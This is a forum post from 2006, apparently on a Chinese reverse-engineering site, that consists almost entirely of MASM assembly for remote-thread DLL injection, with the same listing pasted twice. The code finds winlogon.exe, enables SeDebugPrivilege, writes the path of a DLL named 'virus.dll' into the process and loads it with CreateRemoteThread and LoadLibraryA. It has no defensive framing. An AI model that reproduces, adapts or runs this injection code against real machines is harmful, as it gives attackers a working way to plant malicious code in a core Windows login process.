-
-
是不是原创?远程线程注入应用2则代码
-
发表于: 2006-3-18 23:13 4666
-
.386
.model flat, stdcall
option casemap:none
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include advapi32.inc
includelib advapi32.lib
CTEXT MACRO y:VARARG
LOCAL sym
CONST segment
IFIDNI <y>,<>
sym db 0
ELSE
sym db y,0
ENDIF
CONST ends
EXITM <OFFSET sym>
ENDM
.data
hWinlogon dd ?
szText db "winlogon.exe",0
szDll db "virus.dll",0
.code
_GetProcessList proc
local @stProcess:PROCESSENTRY32
local @hSnapShot,@dwszlen
invoke lstrlen, addr szText
mov @dwszlen, eax
invoke RtlZeroMemory,addr @stProcess,sizeof @stProcess
mov @stProcess.dwSize,sizeof @stProcess
invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0
mov @hSnapShot,eax
invoke Process32First,@hSnapShot,addr @stProcess
.while eax
mov edi, offset szText
lea esi, @stProcess.szExeFile
mov ecx, @dwszlen
REPE CMPS BYTE PTR ES:[EDI],BYTE PTR [ESI]
JE getid
invoke Process32Next,@hSnapShot,addr @stProcess
.endw
invoke CloseHandle,@hSnapShot
ret
getid:
mov eax, @stProcess.th32ProcessID
mov hWinlogon, eax
invoke CloseHandle,@hSnapShot
ret
_GetProcessList endp
start:
invoke _GetProcessList
.if hWinlogon == 0
invoke MessageBox, NULL, CTEXT("没得到winlogon进程id"), CTEXT("失败"), MB_OK
invoke ExitProcess,NULL
.endif
;push CTEXT("C:\\virus\\qopop.dll") ;dll名字
push offset szDll
push hWinlogon
call l11111
;invoke l11111, hWinlogon, addr szDll
invoke MessageBox, NULL, CTEXT("成功注入了dll"), CTEXT("成功"), MB_OK
invoke ExitProcess,NULL
;打开进程安装dll
l11111:
PUSH ECX
PUSH ECX
PUSH EBP
XOR EBP,EBP
CMP [ESP+10h],EBP
JE L011
MOV [ESP+4h],EBP
MOV [ESP+8h],EBP
CALL l22222
TEST EAX,EAX
JNZ L013
L011:
XOR EAX,EAX
JMP L084
L013:
PUSH EDI
PUSH DWORD PTR [ESP+14h]
;MOV DWORD PTR [10083004],1
PUSH EBP
PUSH 42Ah
CALL OpenProcess
MOV EDI,EAX
CMP EDI,EBP
JE L082
PUSH EBX
PUSH ESI
PUSH DWORD PTR [ESP+20h]
CALL lstrlenA
PUSH 4
MOV ESI,EAX
PUSH 1000h
INC ESI
PUSH ESI
PUSH EBP
PUSH EDI
CALL VirtualAllocEx
MOV EBX,EAX
CMP EBX,EBP
JE L078
PUSH EBP
PUSH ESI
PUSH DWORD PTR [ESP+28h]
PUSH EBX
PUSH EDI
CALL WriteProcessMemory
TEST EAX,EAX
JE L068
;PUSH 10069298
;PUSH 1006928C
PUSH CTEXT("LoadLibraryA")
push CTEXT("Kernel32")
CALL GetModuleHandleA
PUSH EAX
CALL GetProcAddress
CMP EAX,EBP
JE L068
PUSH EBP
PUSH EBP
PUSH EBX ;参数
PUSH EAX ;eip
PUSH EBP
PUSH EBP
PUSH EDI
CALL CreateRemoteThread
MOV ESI,EAX
CMP ESI,EBP
JE L069
PUSH -1
PUSH ESI
CALL WaitForSingleObject
MOV DWORD PTR [ESP+10h],1
JMP L069
L068:
MOV ESI,[ESP+14h]
L069:
PUSH 8000h
PUSH EBP
PUSH EBX
PUSH EDI
CALL VirtualFreeEx
CMP ESI,EBP
JE L078
PUSH ESI
CALL CloseHandle
L078:
PUSH EDI
CALL CloseHandle
POP ESI
POP EBX
L082:
MOV EAX,[ESP+8]
POP EDI
L084:
POP EBP
POP ECX
POP ECX
RETN 8
;提升权限
l22222:
PUSH EBP
MOV EBP,ESP
SUB ESP,14h
LEA EAX,[EBP-4]
PUSH EAX
PUSH 28h
CALL GetCurrentProcess
PUSH EAX
CALL OpenProcessToken
TEST EAX,EAX
JE L039
PUSH ESI
LEA EAX,[EBP-10h]
PUSH EAX
;PUSH 10069200
PUSH CTEXT("SeDebugPrivilege")
XOR ESI,ESI
PUSH ESI
CALL LookupPrivilegeValueA
TEST EAX,EAX
JE L033
PUSH ESI
PUSH ESI
PUSH ESI
LEA EAX,[EBP-14h]
PUSH EAX
PUSH ESI
PUSH DWORD PTR [EBP-4]
MOV DWORD PTR [EBP-14h],1
MOV DWORD PTR [EBP-8],2
CALL AdjustTokenPrivileges
TEST EAX,EAX
JE L033
INC ESI
L033:
PUSH DWORD PTR [EBP-4]
CALL CloseHandle
MOV EAX,ESI
POP ESI
LEAVE
RETN
L039:
XOR EAX,EAX
LEAVE
RETN
end start
.model flat, stdcall
option casemap:none
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include advapi32.inc
includelib advapi32.lib
CTEXT MACRO y:VARARG
LOCAL sym
CONST segment
IFIDNI <y>,<>
sym db 0
ELSE
sym db y,0
ENDIF
CONST ends
EXITM <OFFSET sym>
ENDM
.data
hWinlogon dd ?
szText db "winlogon.exe",0
szDll db "virus.dll",0
.code
_GetProcessList proc
local @stProcess:PROCESSENTRY32
local @hSnapShot,@dwszlen
invoke lstrlen, addr szText
mov @dwszlen, eax
invoke RtlZeroMemory,addr @stProcess,sizeof @stProcess
mov @stProcess.dwSize,sizeof @stProcess
invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0
mov @hSnapShot,eax
invoke Process32First,@hSnapShot,addr @stProcess
.while eax
mov edi, offset szText
lea esi, @stProcess.szExeFile
mov ecx, @dwszlen
REPE CMPS BYTE PTR ES:[EDI],BYTE PTR [ESI]
JE getid
invoke Process32Next,@hSnapShot,addr @stProcess
.endw
invoke CloseHandle,@hSnapShot
ret
getid:
mov eax, @stProcess.th32ProcessID
mov hWinlogon, eax
invoke CloseHandle,@hSnapShot
ret
_GetProcessList endp
start:
invoke _GetProcessList
.if hWinlogon == 0
invoke MessageBox, NULL, CTEXT("没得到winlogon进程id"), CTEXT("失败"), MB_OK
invoke ExitProcess,NULL
.endif
;push CTEXT("C:\\virus\\qopop.dll") ;dll名字
push offset szDll
push hWinlogon
call l11111
;invoke l11111, hWinlogon, addr szDll
invoke MessageBox, NULL, CTEXT("成功注入了dll"), CTEXT("成功"), MB_OK
invoke ExitProcess,NULL
;打开进程安装dll
l11111:
PUSH ECX
PUSH ECX
PUSH EBP
XOR EBP,EBP
CMP [ESP+10h],EBP
JE L011
MOV [ESP+4h],EBP
MOV [ESP+8h],EBP
CALL l22222
TEST EAX,EAX
JNZ L013
L011:
XOR EAX,EAX
JMP L084
L013:
PUSH EDI
PUSH DWORD PTR [ESP+14h]
;MOV DWORD PTR [10083004],1
PUSH EBP
PUSH 42Ah
CALL OpenProcess
MOV EDI,EAX
CMP EDI,EBP
JE L082
PUSH EBX
PUSH ESI
PUSH DWORD PTR [ESP+20h]
CALL lstrlenA
PUSH 4
MOV ESI,EAX
PUSH 1000h
INC ESI
PUSH ESI
PUSH EBP
PUSH EDI
CALL VirtualAllocEx
MOV EBX,EAX
CMP EBX,EBP
JE L078
PUSH EBP
PUSH ESI
PUSH DWORD PTR [ESP+28h]
PUSH EBX
PUSH EDI
CALL WriteProcessMemory
TEST EAX,EAX
JE L068
;PUSH 10069298
;PUSH 1006928C
PUSH CTEXT("LoadLibraryA")
push CTEXT("Kernel32")
CALL GetModuleHandleA
PUSH EAX
CALL GetProcAddress
CMP EAX,EBP
JE L068
PUSH EBP
PUSH EBP
PUSH EBX ;参数
PUSH EAX ;eip
PUSH EBP
PUSH EBP
PUSH EDI
CALL CreateRemoteThread
MOV ESI,EAX
CMP ESI,EBP
JE L069
PUSH -1
PUSH ESI
CALL WaitForSingleObject
MOV DWORD PTR [ESP+10h],1
JMP L069
L068:
MOV ESI,[ESP+14h]
L069:
PUSH 8000h
PUSH EBP
PUSH EBX
PUSH EDI
CALL VirtualFreeEx
CMP ESI,EBP
JE L078
PUSH ESI
CALL CloseHandle
L078:
PUSH EDI
CALL CloseHandle
POP ESI
POP EBX
L082:
MOV EAX,[ESP+8]
POP EDI
L084:
POP EBP
POP ECX
POP ECX
RETN 8
;提升权限
l22222:
PUSH EBP
MOV EBP,ESP
SUB ESP,14h
LEA EAX,[EBP-4]
PUSH EAX
PUSH 28h
CALL GetCurrentProcess
PUSH EAX
CALL OpenProcessToken
TEST EAX,EAX
JE L039
PUSH ESI
LEA EAX,[EBP-10h]
PUSH EAX
;PUSH 10069200
PUSH CTEXT("SeDebugPrivilege")
XOR ESI,ESI
PUSH ESI
CALL LookupPrivilegeValueA
TEST EAX,EAX
JE L033
PUSH ESI
PUSH ESI
PUSH ESI
LEA EAX,[EBP-14h]
PUSH EAX
PUSH ESI
PUSH DWORD PTR [EBP-4]
MOV DWORD PTR [EBP-14h],1
MOV DWORD PTR [EBP-8],2
CALL AdjustTokenPrivileges
TEST EAX,EAX
JE L033
INC ESI
L033:
PUSH DWORD PTR [EBP-4]
CALL CloseHandle
MOV EAX,ESI
POP ESI
LEAVE
RETN
L039:
XOR EAX,EAX
LEAVE
RETN
end start
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
赞赏
他的文章
- [原创]来个传说中不可破解的CrackMe--壹只老虎CrackMe01_Delphi 算密钥 5140
- 可以在softice下跑的icesword.v1.12 12948
- Themida1.3.3.0正式版破解 29031
- aspr族谱 4101
- 是不是原创?远程线程注入应用2则代码 4667
看原图
赞赏
雪币:
留言: